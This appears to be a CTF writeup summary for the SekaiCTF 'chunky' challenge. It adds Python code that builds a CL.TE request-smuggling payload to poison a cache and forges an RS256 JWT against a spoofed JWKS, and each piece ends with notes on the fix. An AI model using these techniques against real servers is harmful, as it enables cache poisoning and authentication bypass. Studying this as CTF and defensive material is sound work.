Tags: cache-poisoning web request-smuggling jwks-spoofing jwt 

Rating: 1.0

Detailed Writeup: https://fireshellsecurity.team/sekaictf-frog-waf-and-chunky/#challenge-chunky-16-solves

TLDR

  • Request smuggling from the cache to nginx (CL.TE: the cache parses the body by Content-Length, nginx by Transfer-Encoding: chunked)
  • Cache poisoning to JWKS spoofing
    • A post containing the attacker's public key gets cached under the JWKS URL
  • Sign the Authorization token with the attacker's private key to get the flag
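The first step in the chain, as an added example (this is not code from the writeup): the same byte stream parsed the way a Content-Length front-end and a chunked back-end each see it, which is what makes the cache key one path while nginx serves another. The host name, the `/posts/1` and `/.well-known/jwks.json` paths and the `X-Ignore` header are assumptions chosen for the demo, not details taken from the challenge.

```python
# Added example, not code from the writeup: a CL.TE desync parsed the two ways
# the TLDR describes. The host name, the /posts/1 and JWKS paths, and the
# X-Ignore header are assumptions chosen for the demo.

def body_by_content_length(stream: bytes):
    """Front-end (cache) view: honour Content-Length, ignore Transfer-Encoding.
    Returns (body, bytes left on the connection)."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value)
    return rest[:length], rest[length:]


def body_by_chunked(stream: bytes):
    """Back-end (nginx) view: honour Transfer-Encoding: chunked, ignore
    Content-Length. Returns (body, bytes left on the connection)."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)   # chunk-size, extensions dropped
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")   # empty trailer section
            return body, rest
        body += rest[:size]
        rest = rest[size + 2:]                     # chunk data plus its CRLF


def build_clte(smuggled_prefix: bytes) -> bytes:
    """One POST whose Content-Length covers the terminating 0-chunk *and* the
    smuggled bytes, so the cache forwards everything as a single request."""
    body = b"0\r\n\r\n" + smuggled_prefix
    return (b"POST / HTTP/1.1\r\nHost: chunky.local\r\n"
            b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n" % len(body)
            + body)


def request_path(raw: bytes) -> str:
    return raw.split(b"\r\n", 1)[0].split(b" ")[1].decode()


def simulate(smuggled_prefix: bytes, next_request: bytes):
    """Return (path the cache keys the next response on, path nginx serves)."""
    stream = build_clte(smuggled_prefix) + next_request
    # Cache: the POST ends at Content-Length; what follows is next_request.
    _, after_post = body_by_content_length(stream)
    cache_key = request_path(after_post)
    # nginx: the POST ends at the 0-chunk; the leftover prefix swallows the
    # request line of next_request into the X-Ignore header value.
    _, leftover = body_by_chunked(stream)
    return cache_key, request_path(leftover)


if __name__ == "__main__":
    prefix = b"GET /posts/1 HTTP/1.1\r\nHost: chunky.local\r\nX-Ignore: "
    nxt = b"GET /.well-known/jwks.json HTTP/1.1\r\nHost: chunky.local\r\n\r\n"
    print(simulate(prefix, nxt))   # ('/.well-known/jwks.json', '/posts/1')
```

The precondition is that the cache forwards the ambiguous request unchanged and reuses the same back-end connection for the next request; then the response nginx produces for `/posts/1` is stored under the key the cache computed for `/.well-known/jwks.json`, which is the second step of the TLDR. A front-end that rejects requests carrying both headers, or normalises them, closes the gap.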
Original writeup (https://fireshellsecurity.team/sekaictf-frog-waf-and-chunky/#challenge-chunky-16-solves).
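The second and third steps, as an added example (not code from the writeup or the challenge): once the document the verifier fetches from the JWKS URL is attacker-controlled, any RS256 token signed with the matching private key is accepted. The block builds a JWKS from an attacker key, mints a token, and checks it against both the real and the spoofed JWKS. The RSA is a toy 512-bit pure-Python implementation so the block runs with the standard library only; the `kid` value, the claims and the exact JWKS shape are assumptions.

```python
# Added example, not from the writeup: JWKS spoofing end to end. Toy 512-bit
# RSA in pure Python (real keys are 2048+ bits; the protocol is identical).
# The kid, the claims and the JWKS layout are assumptions for the demo.
import base64
import hashlib
import json
import secrets


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin, sufficient for a throwaway demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(2 + secrets.randbelow(n - 3), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_rsa(bits: int = 512) -> dict:
    e = 65537
    while True:
        p = q = 0
        while not _probable_prime(p):
            p = secrets.randbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        while not _probable_prime(q):
            q = secrets.randbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:           # e is prime, so this is gcd(e, phi) == 1
            return {"n": p * q, "e": e, "d": pow(e, -1, phi)}


_SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def _pkcs1v15_encode(message: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5 with SHA-256 (RFC 8017 9.2): 00 01 FF..FF 00 DigestInfo."""
    t = _SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def jwks_for(key: dict, kid: str) -> dict:
    """The JWKS document whoever owns `key` would publish for it."""
    n, e = key["n"], key["e"]
    return {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": kid,
                      "n": b64u(n.to_bytes((n.bit_length() + 7) // 8, "big")),
                      "e": b64u(e.to_bytes((e.bit_length() + 7) // 8, "big"))}]}


def rs256_sign(key: dict, kid: str, claims: dict) -> str:
    k = (key["n"].bit_length() + 7) // 8
    header = {"alg": "RS256", "typ": "JWT", "kid": kid}
    signing_input = ".".join(b64u(json.dumps(part, separators=(",", ":")).encode())
                             for part in (header, claims))
    em = int.from_bytes(_pkcs1v15_encode(signing_input.encode(), k), "big")
    return signing_input + "." + b64u(pow(em, key["d"], key["n"]).to_bytes(k, "big"))


def rs256_verify(jwks: dict, token: str):
    """Claims if the signature checks against the kid-matching key in jwks, else None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64u_decode(h))
        if header.get("alg") != "RS256":
            return None
        jwk = next(j for j in jwks["keys"] if j.get("kid") == header.get("kid"))
        n = int.from_bytes(b64u_decode(jwk["n"]), "big")
        e = int.from_bytes(b64u_decode(jwk["e"]), "big")
        k = (n.bit_length() + 7) // 8
        sig = int.from_bytes(b64u_decode(s), "big")
        if sig >= n:
            return None
        em = pow(sig, e, n).to_bytes(k, "big")
    except (ValueError, KeyError, StopIteration):
        return None
    return json.loads(b64u_decode(p)) if em == _pkcs1v15_encode(f"{h}.{p}".encode(), k) else None


def demo():
    """Same token checked against the real JWKS and the poisoned one."""
    server_key, attacker_key = gen_rsa(), gen_rsa()
    real_jwks = jwks_for(server_key, "srv")
    spoofed_jwks = jwks_for(attacker_key, "srv")    # same kid, attacker's modulus
    token = rs256_sign(attacker_key, "srv", {"sub": "admin"})
    return rs256_verify(real_jwks, token), rs256_verify(spoofed_jwks, token)
```

The verifier is not broken: the signature is mathematically valid for the key it was given. The flaw is upstream, in trusting a JWKS URL whose content the attacker can replace. Pinning the key set, or at least refusing to refetch keys from a path that the front-end cache serves, is the fix this chain points at.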